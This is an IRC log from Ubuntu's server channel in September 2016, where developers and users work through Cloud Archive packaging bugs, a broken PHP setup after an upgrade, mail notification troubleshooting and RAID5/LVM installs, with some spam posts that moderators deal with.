<nacc> MelRay: not sure how easy it will be to translate that to LVM, but it minimally shows how to use other disks
<nacc> teward: yeah, i'll ask about that
<teward> nacc: though, i'd expect it to be mounted if it's failing at installation
<MelRay> Ideally I wish I had 4 disks..then I would just do RAID 10 and move on...
<teward> nacc: unless /run/ or such is on its own partition or something and is full, or there's some other disk issue (RO filesystem perhaps due to errors)
<nacc> MelRay: i also wonder if it would be as simple as telling partman-auto/disk there are two disks 'd-i partman-auto/disk string /dev/sda /dev/sdb' then specify LVM and see what it does?
<teward> i'm going to go rest though, still not 100% and been beating my head against owncloud for an hour
<nacc> teward: np, thanks again!
<MelRay> Gotcha...will try it
<frickler> coreycb: neutron needs dnsmasq 2.76 to work properly with dhcpv6, see https://review.openstack.org/#/c/301747/ , is there a chance to get the version from yakkety into uca-newton? or backport the dhcp_release6 tools into 2.75 on xenial?
<EmilienM> coreycb: hey, our CI is currently broken with http://logs.openstack.org/51/367551/4/check/gate-puppet-openstack-integration-3-scenario002-tempest-ubuntu-xenial/1f154da/console.html#_2016-09-08_19_06_18_313029
<EmilienM> jamespage: ^
<EmilienM> http://logs.openstack.org/51/367551/4/check/gate-puppet-openstack-integration-3-scenario002-tempest-ubuntu-xenial/1f154da/console.html#_2016-09-08_19_06_18_318057
<coreycb> EmilienM, is it the ironic error?
<EmilienM> yes
<coreycb> EmilienM, looks like it has some recent updates, I'll take a look
<EmilienM> thanks
<coreycb> frickler, I'll need to run that by some other folks to see if we can do that.
<coreycb> EmilienM, we'll have a fix by tomorrow.  do you have a work around?
<EmilienM> coreycb: yes, we disable ironic testing on ubuntu.
<EmilienM> do you have CI testing Ironic?
<coreycb> EmilienM, ok. you can do that or this should work before installing ironic: http://paste.ubuntu.com/23151534/
<coreycb> EmilienM, we have unit and dep8 testing for ironic
<EmilienM> how come we have to do http://paste.ubuntu.com/23151534/ after X releases ?
<EmilienM> I mean, Ironic used to work before...
<coreycb> EmilienM, this fix regressed it: https://bugs.launchpad.net/cloud-archive/+bug/1450942
<ubottu> Launchpad bug 1450942 in ironic (Ubuntu) "ironic package does not ensure permissions on /var/log/ironic" [Medium,Fix released]
<coreycb> EmilienM, btw that's just a work around ^
<LuMint> hi! any recommends on a ftp server that's capable of ftpes?
<EmilienM> coreycb: sure
<LuMint> I'm familiar with Filezilla Server for Windows, now I'm looking for the alternative
<jamespage> EmilienM, coreycb: that was me sweeping up old bugs today
<coreycb> jamespage, I think 'chown -R ironic:adm /var/lib/ironic' in postinst will fix it, just testing that out and will upload
<jamespage> coreycb,     chown ironic:ironic -R /var/lib/ironic /etc/ironic
<jamespage> is on the lines after the db sync
<jamespage> needs to be before
<jamespage> wtf - /etc/ironic
<jamespage> that sounds dodgy to me
<coreycb> jamespage, ok yeah that could be moved up
<jamespage> coreycb, actually there are no dep-8 tests for ironic - we should add one
<jamespage> at least to check the install
<jamespage> but I thought that happened auto-magically
<jamespage> evidently not
<jamespage> coreycb, we can add dnsmasq to the review for ovs and dpdk  - lets make sure we discuss that tomorrow
<coreycb> jamespage, sounds good
<jamespage> coreycb, you want to let me sort out my ironic foobar?
<jamespage> happy todo that now if you like
<jamespage> I'll even test it
 * jamespage looks sheepish
<coreycb> jamespage, sure go ahead since you can promote everything quickly
<EmilienM> coreycb, jamespage: please let me know when I can retry
<jamespage> EmilienM, just testing the fix now
<jamespage> but will take a little time to work through to proposed
<jamespage> EmilienM, are you testing with the newton-proposed pocket on xenial?
<EmilienM> no prob
<EmilienM> let me check
<EmilienM> we're testing updates repos for newton
<EmilienM> jamespage: ^
<jamespage> EmilienM, right-oh
<jamespage> EmilienM, do you test neutron-lbaas in any way? just a headsup that v1 agent (neutron-lbaas-agent) was removed this cycle
<jamespage> that's reflected in the b3 packaging
<EmilienM> jamespage: yes we do
<EmilienM> and yes we already test v2 only
<jamespage> EmilienM, that's fine
<jamespage> nochanges there
<jamespage> coreycb, uploading, added minimal install autopkgtest to stop install type issues
<jamespage> its not a functional test but at least gets things moving in the right direction
<coreycb> jamespage, sounds good, thanks
<LuMint> I'm familiar with Filezilla Server for Windows, now I'm looking for the alternative. Any ideas?
<jamespage> EmilienM, taking a while to go through to updates
<jamespage> EmilienM, suggest retest tomorrow - I'll finish and test before you start your day
<EmilienM> jamespage: perfect
<EmilienM> thanks
<EmilienM> jamespage, coreycb: found another bug
<EmilienM> neutron when using linuxbridge
<EmilienM> http://logs.openstack.org/51/367551/5/check/gate-puppet-openstack-integration-3-scenario003-tempest-ubuntu-xenial/d634f0b/logs/neutron/neutron-linuxbridge-agent.txt.gz#_2016-09-08_21_46_45_383
<EmilienM> impossible to boot a VM
<EmilienM> jamespage, coreycb: https://bugs.launchpad.net/cloud-archive/+bug/1621651
<ubottu> Launchpad bug 1621651 in Ubuntu Cloud Archive "neutron linuxbridge fails to create interfaces" [Undecided,New]
#ubuntu-server 2016-09-09
<Kamilion> wxl pointed me this-a-way to ask about getting information on why xen 4.7 isn't around in yakkity or xenial yet? nacc indicated it hadn't hit debian yet; would that be the primary reason?
<roaksoax> /w/win 6
<ANTARES> http://i.imgur.com/isKNHz7.png
<qmake> hello, how can I make lldpad service emit actual MAC addr instead of the bond MAC?
<smb> Kamilion, mostly the same answer as on ubuntu-realease (because Debian has had nothing either). Though there has been requests and there might be something coming soon(ish). Don't want to make too strong promises, though
<Kamilion> no worries
<Kamilion> 4.8's supposed to be decemberish; but I'm not even seeing a roadmap page for it on their wiki yet
<FManTropyx> hi
<smb> Kamilion, Yeah, maybe still more in their email working format. Debian had been asked about 4.7, too but I have not seen any reply that sounded like they might be working on it. I got a ppa ready (ppa:smb/xen) but since we missed feature freeze its a bit of paperwork to still get it into release
<Kamilion> yeah, I have no real reason to rush ahead right now for https://github.com/kamilion/kamikazi-core
<Kamilion> waiting for the XSA 185-187 patches to show so I can rebuild the ISO again
<smb>  another round of xsa's is also on my todo list... in that plenty of spare time we all have
<Kamilion> yep. Just a wee bit more painful when rolling appliance images
<Kamilion> so glad I spent the time automating it over the past 3 years
<Kamilion> almost as painless as an apt-get upgrade now
<Kamilion> not quite as nice as snappy
<Kamilion> I *did* include it, as well as snapcraft, but it seems broken in liveisos since the whole system's running from a squashfs
<Kamilion> and it really doesn't like TORAM=Yes
<smb> I guess that side is something I luckily don't have to fight with. Only to keep all levels of old releases somehow still working and updated as well
<Kamilion> yeah, i'll be using 16.04 as my base for a while; seeing the newer xens trickle down to 14.04 was a very nice feeling, and I hope it continues for 16.04
<smb> I actually wanted to do upstream minor releases there, too. So maybe a 4.6.3+ ... but again stupid to do lists which get buried by "stuff"
<ANTARES> https://vk.com/theshiva
<jamespage> EmilienM, ironic fixed, tested and promoted to updates
<jamespage> os-vif working its way through now
<jamespage> rbasak: hey - I'm struggling to figure out the cause of https://bugs.launchpad.net/ubuntu/+source/python-cryptography/+bug/1620754
<ubottu> Launchpad bug 1620754 in python-cryptography (Ubuntu) "python-cryptography ftbfs for 3.5 on armhf with a bus error" [High,In progress]
<jamespage> I've reproduced, but I'm a little out of my depth understanding what might be the cause here - could -you take a look?
<jamespage> rbasak: don't worry - pinged this back to doko as its something foundational in python, not python-cryptography
<ANTARES>  https://vk.com/socialingenering VIDEO LINUX XUBUNTU PRE
<Kamilion> httpz:\\tld.co
<Kamilion> httpz:\\tld.co\socialengineering    dangit, stupid \ over the enter key
<Kamilion> or feed the trolls further with http://lmgtfy.com/?q=social+engineering
<jamespage> EmilienM, just promoted os-vif 1.2.1 to updates as well
<jamespage> that should sort out your current issues
<EmilienM> jamespage: thanks
<FManTropyx> welp, after upgrading to 16.04.1, it seems that my Apache2 is not processing PHP
<iamcurio_> any idea how i can get php error logs on a fresh install on unbuntu 16.4, error log currently showing âno valueâ in my phpinfo
<FManTropyx> "Invalid Mutex directory in argument file:${APACHE_LOCK_DIR}"
<jamespage> EmilienM, ironic and os-vif where your two ubuntu issues right?
<EmilienM> jamespage: yes
<jamespage> EmilienM, good
<EmilienM> jamespage: the modprobe thing also was not a blocker but still a problem
<EmilienM> jamespage: have you seen it in the bug report?
<EmilienM> it's not critical but it shows errors in neutron logs if you don't load the kernel module
<EmilienM> I would suggest to automatically load it in packaging or something
<jamespage> EmilienM, hmm
<jamespage> that's not fixed by os-vif 1.2.1?
<EmilienM> jamespage: I don't think so
<EmilienM> jamespage: again, the kernel module stuff is not something I saw before because I wasn't reading all logs but yesterday by investigating the os vif error, I found it
<FManTropyx> why did PHP stop working after upgrading to 16.04.1?
<FManTropyx> I have originally set up this system from Digital Ocean LAMP image 14.04
<Kamilion> m-m-m-m-m-magic. Also probably apt asking you if you wanted to restore the maintainer's version of a config file and you responding affirmative, or another task responding affirmative for you.
<jamespage> EmilienM, so that's not a new issue?
<Kamilion> FManTropyx: pretty commonly, /etc/nginx/nginx.conf or /etc/php5/fpm/pool.d/www.conf was restored to a default, but you indicate LAMP, not LNMP
<Kamilion> depending on your apache2 configuration, if php's hosted out of process with fpm or in process can make a difference.
<FManTropyx> hmm, I didn't expect things to break apart like this, but you make sense :)
<Kamilion> i havn't touched apache in a while, but my bet is something /etc/ getting 'restored' to the maintainer's copy
<FManTropyx> I ran the automatic dist upgrade and I do not recall it asking about Apache config
<Kamilion> i see it a lot when people mess with /etc/nginx/nginx.conf instead of using /etc/nginx/conf.d/yourfilename.conf
<Kamilion> and then apt restores /etc/nginx/nginx.conf and they're left in confusion
<jamespage> EmilienM, is there a specific scope that module and those settings are required for?
<jamespage> i.e. just linuxbridge-agent?
<EmilienM> jamespage: yes
<EmilienM> just lb
<Kamilion> especally if you told ubuntu you want security updates automatically during installation, and the nginx package is marked as a security update.
<Kamilion> there's a couple cases where your config can get overwritten without you ever seein a prompt in the name of security
<Kamilion> g'luck trackin' it down.
<FManTropyx> I wonder what the package for PHP7 Apache module is :P
<Kamilion> I wouldn't be suprised if it was /etc/php5/apache2/ out of compatibility >.<
<FManTropyx> ...
<ogra_> apt-cache search apache php7 ?
<FManTropyx> thanks! I'll try to fix this later
<Kamilion> otherwise I'd expect it might have changed to /etc/php7/apache2/
<Kamilion> ah sorry, just realized now I misread the question, it's nearing 6am, I should probably catch some sleep if I'm gonna.
<FManTropyx> it was as simple as installing libapache2-mod-php7.0
<FManTropyx> I has PHP again
<Kamilion> mm, will keep that in mind; I've got a 14.04->16.04 to do that'll probably need the same treatment.
<FManTropyx> I didn't think that it wouldn't be automatically installed, but maybe there was something in the Digital Ocean image
<FManTropyx> thank you very much for the help!!
<Kamilion> g'luck, enjoy your ubuntu
<ogra_> you should take into account that php7 ihas language differences to php5 ...
<ogra_> you might need to change your code to have it fully working
<EmilienM> jamespage: our CI is green with ubuntu updates, thanks
<Kamilion> that's the app developer's problem (in that client's case, Xenforo)
<jamespage> EmilienM, yw
<caribou> rbasak: Looking a the tomsfastmath MIR for clamav : I suppose that the server team will take responsability for it ?
<jamespage> EmilienM, hey - I was looking for a precendent with regards loading of kernel modules in systemd ExecStartPre stanzas, found some so going to fix up that module load issue
<EmilienM> jamespage++
<EmilienM> thanks
<jamespage> EmilienM, the return code of the modprobe will always be ignored - if the module is already loaded, we don't want the agent not to start!
<ANTARES> WhatsApp & Viber +74957487265 REXANT ELECTRIC FROM RUSSIA
<jamespage> also deals with funky trick deployments in lxd containers :-)
<EmilienM> jamespage: excellent
<jamespage> EmilienM, I'm a little blind on this change as we don't have linuxbridge in our ci
<EmilienM> jamespage: no worries, we have the tests in place
<jamespage> EmilienM, I'll do a preflight install check just to ensure that the agent will start and then I'll upload
<jamespage> EmilienM,
<jamespage>   Process: 27309 ExecStartPre=/sbin/modprobe br_netfilter (code=exited, status=0/SUCCESS)
<jamespage> lgtm uploading
<EmilienM> jamespage: ack, thx again
<jamespage> EmilienM, ok uploaded - it will take a while to work through to xenial/newton-updates
<EmilienM> ack, excellent!
<ogra_> ANTARES, can you stop the spamming ?
<ogra_> it starts getting annoying
<ANTARES> ok
<ANTARES> Ð Ð°Ð±Ð¾ÑÐ° Ð² ÐÐ¡Ð http://ÐºÐ¸Ð±ÐµÑÐ°Ð¼Ð¿ÐµÑ.ÑÑ/Ð²Ð°ÐºÐ°Ð½ÑÐ¸Ð¸
<EmilienM> ogra_: /IGNORE ANTARES and you're good :)
<ogra_> EmilienM, nope
<ogra_> that means the spamming goes on
<EmilienM> there is no admi nhere?
<ogra_> there are admins, but invoking them is a last resort ... in ubuntu channels we cound on common sense ...
<ogra_> only if that doesnt help people get banned, kicked or whatever  :)
<grauzikas> Hello,
<grauzikas> i have a problem with ubuntu servers, i have an KVM dell 2161DS-2 and when i`m installing on a server ubuntu OS i cant see video
<grauzikas> i think may be this is resolution problem or something like it
<grauzikas> i can see KVM until grub (grub excluded)
<grauzikas> with other OS like debian/centos everything works perfect, ubuntu wont show display
<grauzikas> i can see only black screen (when there is no connection kvm window shows no signal)
<samba35> i (think ) have setup a maas server on ubuntu server 16.04.01 it has maas version 2 , once i was able to login to web gui with http://ipaddress:5240/maas but after that i am getting No Such Resource
<samba35> No such child resource. what  could be a issue ?
<samba35> this is my 1st setup of maas server ,and trying to understand how it work ,and its features
<coreycb> jamespage, beisner: these are ready to promote when you have a moment: http://paste.ubuntu.com/23154732/
<samba35> how to i check all services on ubuntu 16.04.1 or any version
<samba35> for ex if i want to start apache2 i will run systemctl restart apache2 but i wan to see all services
<grauzikas> ls /etc/init.d
<grauzikas> service --status-all
<samba35> ok
<samba35> thanks
<samba35> is 16.04.x new services also start from this location or they are in some other location ?
<grauzikas> you can use service for start, restart, stop, list status of all servers
<grauzikas> because i am accustomed to old type i`m still using /etc/init.d
<grauzikas> never had any issues :)
<ANTARES> WANTED!!! https://pp.vk.me/c637725/v637725485/cf19/-Ix63wFLYWo.jpg
<ogra_> !ops
<ubottu> Help! Channel emergency! infinity, soren, lamont, mathiaz, Pici, Daviey, Tm_T, pmatulis, Corey, IdleOne, ikonia, funkyhat, Myrtti, ocean, genii, phunyguy!
<phunyguy> ogra_: what's up?
<ogra_> can you please kick and ban ANTARES, he is constantly spamming with unrelatted links, ads and whatsapp requests
<ogra_> he has been warned
<ogra_> this goes on since a week or so
<ogra_> thanks a lot
<phunyguy> THanks. ogra_
<grendal_prime>  #qgis
<samba35>  when i run systemctl list-dependencies some services are showing with red button /icon is that mean is that services not running  ? on ubuntu 16.04.1
<beisner> hi coreycb - apologies for the delay.  checking those package promotions now.
<inc0> hey guys, not sure if this is good place to reach Ubuntu Cloud Archive people, but neutron-lbaas-agent package isn't installing now
<inc0> neutron-lbaas-agent : Depends: neutron-lbaas-common (= 2:9.0.0~b2-0ubuntu1~cloud0) but 2:9.0.0~b3-0ubuntu1~cloud0 is to be installed
<sarnold> inc0: it looks like both those packages are generated from the same source package
<inc0> yeah they are
<sarnold> inc0: which I think means something fishy is going on; what does apt-cache policy say about both packages? does a re-run of apt-get update fix it? which cloud archive server are you using?
<inc0> sarnold, it's fresh docker builds, on both local disk and openstack infra
<inc0> http://ubuntu-cloud.archive.canonical.com/ubuntu xenial-updates/newton main
<inc0> it seems somebody released b3 for lbaas-common but not lbaas-agent
<sarnold> that's certainly what the directory listing at http://ubuntu-cloud.archive.canonical.com/ubuntu/pool/main/n/neutron-lbaas/ suggests
<sarnold> "something fishy" indeed :)
<sarnold> inc0: I believe ubuntu-bug knows how to file bugs against the cloud archives; try "ubuntu-bug neutron-lbass-agent" or "ubuntu-bug neutron-lbass-common"; hopefully the first works but I don't think it makes much difference
<inc0> I'll give guys couple more days, we're in the middle of release so little f-ups are expected, I was just wondering if any of them look here so I can provide quick feedback
<sarnold> jamespage: inc0 reports neutron-lbaas-common vs neutron-lbaas-agent mismatch
<sarnold> inc0: most days I'd say that's fine but it's already past many people's EOWs.. I don't know where jamespage is, but it might be past his EOW as well, in which case a bug would be way less likely to be overlooked than an irc message
<inc0> yeah, just enjoy your weekend guys
<inc0> that's just something we've seen in our gates
<sarnold> you too, thanks
<beisner> coreycb, icehouse-updates and liberty-updates promoted.  liberty-proposed was already complete.  http://paste.ubuntu.com/23154732/
<ddellav> sarnold looks like lbaas-agent was removed from the package contents because the v1 version was removed upstream
<ddellav> the new package name is python-lbaasv2-agent
<beisner> thanks ddellav
<ddellav> i did the b3 update for that package so i feel a bit responsible ;)
<ddellav> though it was jamespage that removed the v1 package previously
<sarnold> ddellav: ah!
<beisner> http://lists.openstack.org/pipermail/openstack-dev/2016-August/102225.html
<sarnold> ddellav: eww :)
<sarnold> ddellav: so, the neutron-lbaasv2-agent paragraph in http://ubuntu-cloud.archive.canonical.com/ubuntu/dists/xenial-updates/newton/main/binary-amd64/Packages doesn't mention that it replaces or conflicts with the old neutron-lbaas-agent package in any way; I'm not sure that'd be enough for the tools to sort out how to do an apt-get dist-upgrade or not, but it'd be a start..
<ddellav> sarnold it's probably appropriate to add a "replaces" block but I'm not quite sure. I've never replaced a binary package before. I'm sure jamespage or coreycb will know. Unfortunately I believe they are sprinting next week so it might take a bit to get to it
<sarnold> ddellav: oh man, I know how exhausting that can be.. "do all your usual work, plus be more productive" :)
<ddellav> indeed
#ubuntu-server 2016-09-10
<yoink> Is there a preferred way to image a server I don't have easy physical access to (IE I don't want to make a datacenter appointment) so that I can test moving from 14.04 to 16.04 before actually doing it on the production machine? Or does rsync remain my best friend?
<RoyK> rsync
<RoyK> unless your server is on snapshotttable storage
<RoyK> is it virtual?
<yoink> No it's a physical machine colo'ed.
<yoink> one of several. the datacenter is, thankfully a 10 minute walk from home so maybe I just bite the bullet and go in with a drive to take a snapshop of the volume. Would be quicker and not chew up any network resources.
<yoink> on a totally different note, is there any way to speedup 16.04 reboots? it seems that on EC2 instances running 16.04 the systems wait quit a while on the network interfaces, though on my local KVM setup they're quicker (but nowhere near as quick as 14.04 was for reboots on any platform)
<sarnold> yoink: the discussions in these bugs may be helpful https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1431774 https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1457400 https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1551415
<ubottu> Launchpad bug 1431774 in wpa (Ubuntu) "network mount hangs on shutdown - NetworkManager needs to stop after network.target" [Medium,Fix released]
<ubottu> Launchpad bug 1457400 in systemd (Ubuntu) "reduce 90s session kill timeout if the session does not shutdown cleanly" [Low,Confirmed]
<ubottu> Launchpad bug 1551415 in ifupdown (Ubuntu) "systemctl stop networking hang / timeout" [High,Confirmed]
<yoink> sarnold: many thanks reading now
<DexterF> greetings
<DexterF> 16.04.1 installation. I'd like to install remotely via ssh. possible? machine is on a dhcp network
<DexterF> quite another issue is that the installer sees only 2 of 3 hard disks and thus won't let me create a raid5. in /proc/partitions they are perfectly listed as sda sdb sdc
<DexterF> to check a general installer bug I spawned a VM with 3 vdisks in Virtualbox and ran a 16.04.1 server installation. that saw the 3 disks but reveleaed quite another problem: once the raid was created I could not create partitions in md0
<DexterF> is there a general problem with that?
<ejat> conjure-up error : http://paste.ubuntu.com/23160160/
#ubuntu-server 2016-09-11
<mko> hi, is it possible to connect freshly installed server to wlan accesspoint (my phone)? It worked fine with desktop via bluetooth and wlan, but I'm clueless how to do it from server.
<mko> There is plenty of guides how to set up server as accesspoint but not the otherway around. Unless you can manually set ip, but I don't think that works on phone accesspoints.
<mko> Might be I need to get some drivers first, while installation seemed to find wifi, server now doesn't seem to find ath0.
<RoyK> mko: google it - http://askubuntu.com/questions/16777/connecting-to-a-wireless-network seems a good start
<mko> yeah just found it thanks
<RoyK> mko: try iwconfig
<mko> wlp3s0 shows IEEE 802.11bhn ESSID:off/any
<RoyK> then try to configure that one
<RoyK> network devices in modern distros don't have the same names as in the old ones
<mko> slight problem is, I can't configure wifi on my phone, its some preset stuff I don't know about
<mko> other than password ofcourse
<mko> I'm not sure how to scan it
<mko> ooh
<mko> either I broke it or it takes a loong time
<mko> should it work if I add "auto wlp3s0; iface wlp3s0 inet dhcp" to interface?
<mko> at least iwlist scan returns no scan results, so that might be a good sign, but there is wlans so it's still not working.
<RoyK> you'll need the ssid and the password obviously
<mko> okay I might be getting there, now iwconfig didnt return error
<mko> but i didnt give it password, I might be blind as I can't seem to find how to from man :o
<mko> I just get invalid argument "password"
<mko> I dont understand how i can misspell "iwconfig ssid key s:pw"
<mko> ssid -> was supposed to write iface
<mko> anyhow it returns "set failed on device iface ; invalid argument
<mko> most likely iphone uses wpa/wpa2 and its not working?
<aates> wpa_supplicant is used to connect with wpa
<mko> I might've gotten further, but wpa_supplicant returns error invalid group wheel, and failed to initialize control interface /var/run/wpa_supplicant
<aates> mko: did you use the right driver? You can see your list of supported drivers with wpa_supplicant -h
<mko> i tried nl80211, wext and wired but no luck
<mko> wext gave also ioctl[siocs]wencodeext]: Invalid argument
<aates> mine was nl80211
<aates> I have panda wifi adaptor
<aates> i ordered it because it said it works on linux
<mko> integrated 802.11 b/g/n or 802.11 ac
<mko> whatever that means
<mko> thanks for helping, nightshift is over and time to go to sleep. :)
<aates> np
<lucas_ai> I'm trying to run a python script on startup. Where should I put the script on my filesystem? And how do I make it start when booting?
<lucas_ai> Am I supposed to use /etc/init or /etc/init.d for my own daemons in the latest ubuntu? The internet doesn't say
<samba35> i am new to maas ,i  think i have setup a maas (getting web gui ) but i have no idea now how do i add node and how do i boot client from host using pxe /remote boot
<samba35> using ubuntu 16.04.1
<lunaphyte> sadly, i must run an ftp server.  can i solicit recommendations for a reasonably unshitty choice of software?
<lunaphyte> ideally, it would support ldap directly.
<lunaphyte> [as opposed to indirectly, through nss/pam]
<cncr04s> pureftpd? just apt it, it has ldap,mysql versions too
<lunaphyte> so far, the consensus seems to be one of pureftp, vsftpd, or proftpd
<lunaphyte> cncr04s: thanks for the vote.  do you specifically prefer pureftpd over the others?
<lunaphyte> oh - it must support ftps too, of course.  plaintext ftp won't be allowed
<natmal> Could someone please help me figure out why unattended-upgrade isn't sending emails, even though it's configured to do so, and it seems to be applying updates correctly?
<ikonia> can you machine send emails
<ikonia> thats the first test
<natmal> Yes. mailx is installed and verified functioning.
<natmal> Or at least the 'mail' command is.
<ikonia> so your host can send mail - how is the unattended-upgrade calling the mail command
<natmal> No idea; I didn't see any configuration for that.
<natmal> MAIL_BINARY = "/usr/bin/mail"
<natmal> And SENDMAIL_BINARY = "/usr/sbin/sendmail"
<ikonia> ok - so it's calling /usr/bin/mail
<ikonia> thats good
<ikonia> check /usr/sbin/sendmail exists and is a s symlink to postfix
<natmal> /usr/sbin/sendmail looks like an ELF
<ikonia> really ? you're running sendmail on your box ?
<ikonia> thats not default
<natmal> I'm not sure where to go from that.
<ikonia> do you have the sendmail package installed ?
<natmal> Lemme figure out how to do that on ubuntu; if these things had Portage I would be able to tell you now. :3
<natmal> dpkg-query says sendmail is not installed.
<natmal> And if I use apt-get to try to install it, it wants to remove postfix and install a bunch of sendmail packages.
<natmal> Default or not, sendmail is functional.
<apb1963>  /usr/share/boot-sav/gui-g2slaunch.sh: line 29: 11520 Segmentation fault      (core dumped) $G2S $1 -g ./$PACK_NAME.glade -s ... full details here:          pastebin.com/kSjuHkPP
<ikonia> natmal: ls -la /usr/sbin/sendmail
<natmal> ikonia: -rwxr-xr-x 1 root root 26648 Apr 13 12:58 /usr/sbin/sendmail
<natmal> It's not a symlink.
<apb1963> natmal: Are you sure they're not just stuck in the queue?  Type mailq
<ikonia> thats very odd, it's normally a symlink, I guess postfix must now be shipping it's vinary as "sendmail"
<natmal> Mail queue is empty.
<ikonia> does the mail log show it trying to be sent
<apb1963> and does unattended-upgrade have a log?  check that for errors.
<natmal> No errors in the unattended-upgrades logs. I'm not sure about the mail log; my assumption is that they're all test emails when I was trying to turn this functionality on last week.
<natmal> Is running unattended-upgrade manually supposed to trigger emails?
<ikonia> check the mail log
<natmal> I have MailOnlyOnError set to "false"
<ikonia> it will show anything that is proccesed by the mail system
<natmal> mail.log only has startup info for postfix (Doesn't have anything about the test email I sent earlier today). mail.log.1 only has entries from the 3rd.
<ikonia> natmal: there should be a postfix log of it's own
<ikonia> the syslog may also show mail attempts (I can't remember the channel split without looking)
<natmal> No mail/postfix attempts that I can find in any of the syslog files.
<ikonia> doesn't look like it's trying to mail out
<ikonia> I'd check the docs to see what the behvaiour is expected
<natmal> Docs say that /usr/bin/mail is required, but the code tries to use /usr/sbin/sendmail? :P
<ikonia> look at what the expected behaviour is
<natmal> There doesn't seem to be any documentation beyond "notifications will be sent to this address assuming you have a working mail setup".
<natmal> I've looked at the Automatic Updates page in the Official Ubuntu Documentation, the AutomaticSecurityUpdates page in the Community Help wiki, and the UnattendedUpgrades page on the Debian wiki.
<patdk-lap> look in /var/log/mail.log
<patdk-lap> and search for pickup
<natmal> patdk-lap: 2 matches from the 3rd; test emails. This system was automatically updated requiring a reboot between then and now.
<patdk-lap> well, the sendmail binary puts the email in the maildrop folder
<patdk-lap> and pickup should see it, and then act on it
<patdk-lap> is postfix running?
<patdk-lap> does /var/spool/postfix/maildrop have files in it?
<natmal> No files in maildrop; postfix is not running.
<natmal> Does postfix need to be running if configured solely as a relay?
<natmal> I take that back; postfix is indeed running.
<ikonia> postfix is not running....you will not get mail
<patdk-lap> does a webserver need to be running to solely serve webpages?
<natmal> Wrong flags on ps. :3
<patdk-lap> if your doing relay only, you should just use a nullmailer instead
<patdk-lap> msmtp, or something
<natmal> Will switching to that make unattended-upgrades start wanting to send mail?
<natmal> I might stick with postfix; I'm not finding much information about SASL support in nullmailer, and msmtp doesn't appear to have a global config?
<natmal> Oh, I think I found it.
<patdk-lap> it's doubtful either of them will solve the issue
<patdk-lap> but it will remove a lot of configuration problems from being the issue
<patdk-lap> using postfix as a nullmailer is generally extreem overkill and extra complications for most
<natmal> Okay, msmtp is configured.
<natmal> Yeah, I think I'm going to stick with postfix. I don't have to jump through a bunch of hoops trying to securely store upstream passwords with msmtp.
<natmal> Huh. I think email notifications are working; I may have been chasing my tail.
<natmal> Thanks for all the help anyway
<lunaphyte> securely store upstream passwords?
<lunaphyte> how do you "securely store upstream passwords" with postfix?
<tomreyn> when is this a use case?
<lunaphyte> what?
<tomreyn> which passwords do you want stored securely?
<lunaphyte> "upstream passwords", he says
<tomreyn> right, that's not very clear, and so i'm asking
<lunaphyte> "upstream passwords" is pretty clear.  "securely storing" them with postfix isn't though
<DexterF> hi
<DexterF> installed server 16.04.1 on: 3 disks in raid5 on sda1 sdb1 sdc1. then on md0 created an lvm PV, there a VG with 3 LV: root, swap, home. so /boot is part of /. it then proceeded to install, then install grub.
<DexterF> won't boot. says "cannot find filesystem" -> grub rescue.
<tomreyn> DexterF: you probably need a separate boot LVM. it's even possible that you need to have it as a separate partition without extra layers.
<lunaphyte>  /boot on lvm is fine
<tomreyn> also make sure the UUIDs in your /etc/fstab are correct (compare to 'blkid' output) and that you have run update-grub, and that you are using an initrd with all modules, not the limited set.
<lunaphyte> i'd suggest mounting with labels rather than uuids in fstab
<tomreyn> lunaphyte: and boot on lvm on md raid5 is fine, too?
<lunaphyte> it works for me
<tomreyn> i'd suggest mounting with uuids rather than labels in fstab ;)
<tomreyn> because they are universal
<lunaphyte> no more so than the label specified by the admin ;)
<tomreyn> if the bios has a bad day and passes devices in a different order (or you, that admin, made some silly changes which affe3ct the boot ordering), it will still work with uuids, but not labels.
<lunaphyte> incorrect
<tomreyn> enlighten me!
<lunaphyte> labels of filesystems do not change just because the devices the filesystems reside on were detected in a different order
<lunaphyte> if a filesystem is labelled 'root', than that is its label.  it doesn't matter when it shows up
<lunaphyte> for reference, here is a system with 4 disks, each with a gpt table containing a raid partition.  assembled into a raid5 device, being used as an lvm pv, with an lv for "/".  no separate /boot.  http://dpaste.com/0A3DX29.txt
<lunaphyte> wag:  you didn't install grub on the right disk [hint: install it on all of them], and/or you should include a bios_grub partition on each of the disks
<DexterF> tomreyn: well, I'll have to rig a live system to assemble the raid first, at present I can't even access the array. update-grub and anything about the initd wsa not really queried, I ran with what the installer wanted to do. I did the entire setup with it, too
<lunaphyte> to do a setup like that, i would suggest running the installer in cli expert mode
<tomreyn> lunaphyte: turns outr we had a misunderstand in regards to the term 'label' - i was assuming you were referring to device paths.
<tomreyn> ...such as /dev/sda1
<lunaphyte> oh
<lunaphyte> i've never heard that called a label
<DexterF> lunaphyte: does the installer offer that at the start...? don't remember such an option
<tomreyn> lunaphyte: you're right, it's not, my bad
<lunaphyte> no worries, it's all good
<lunaphyte> DexterF: yes
<DexterF> lunaphyte: ok, i'll retry then.
<lunaphyte> you need to press an f key or something like that, iirc
<lunaphyte> is this for a server?
<lunaphyte> i guess regardless, i'd also suggest the minimal installer iso
<DexterF> one other thing: it seems I had to go LVM as I did not see any options in the installer to create md partitions, so md0p1 etc. not available? stick to lvm anyway?
<lunaphyte> that said, you could boot into the live cd, and assembly the bits yourself from a shell, i suppose
<lunaphyte> i would always use lvm, period.
<tomreyn> personally i'd even go so far as to do the parititioning first, from a live linux, then use the installer to install.
<DexterF> lunaphyte: actually it's going to be a media center on kodi, so I will install a light desktop afterwards, I went for the server variant to directly install as raid5 on the existing 3 disks, I did not want to add another disk for keeping the power consumption at bay
<lunaphyte> if it were me, i'd do the minimal iso installer
<DexterF> I got the 600MB cd on usb here, any gain in switiching to minimal? that will start on expert cli right away?
<lunaphyte> no, but you'll not end up with a bunch of garbage that you have no use for
<lunaphyte> well, you still will - but less of it
<lunaphyte> ubuntu *sucks* at understanding the concept of minimal :)
<DexterF> sounds good, after all, I'll need X, kodi, tvheadend and compile the latter ones from src anyway
<lunaphyte> you can always sintall whatever you want, at any time.
<lunaphyte> *install
<DexterF> that's the plan
<DexterF> by the way, if I can boot the iso, can I do the installation remotely via ssh somehow?
<lunaphyte> probably
<DexterF> ok, no official feature then.
<lunaphyte> there might be.  it's just not something i happene to be familiar with
<lunaphyte> *happen
<DexterF> there is talk of the "network installer" - that said "minimal" iso?
